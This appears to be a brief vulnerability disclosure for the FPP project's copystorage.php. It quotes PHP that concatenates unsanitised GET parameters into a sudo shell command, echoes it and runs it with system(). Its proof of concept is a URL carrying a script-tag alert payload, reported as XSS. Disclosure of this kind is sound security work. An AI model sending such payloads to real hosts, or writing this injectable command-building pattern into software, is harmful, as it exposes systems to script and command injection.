✍️ Description

In https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/copystorage.php#L29 you echo a command built with untrusted user-input without sanitizing it :

<?php
    $date = date("Ymd-Hi");
    $path = preg_replace('/{DATE}/', $date, $_GET['path']);

        echo "==================================================================================\n";

    $command = "sudo /opt/fpp/scripts/copy_settings_to_storage.sh " . $_GET['storageLocation'] . " " . $path . " " . $_GET['direction']  . " " . $_GET['delete'] . " " . $_GET['flags'] . " 2>&1";

        echo "Command: $command\n"; // I can embed custom and malicious JS here
        echo "----------------------------------------------------------------------------------\n";
        system($command);
        echo "\n";

?>

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/copystorage.php?storageLocation=%3Cscript%3Ealert(%22zer0h%22);%3C/script%3E

💥 Impact

XSS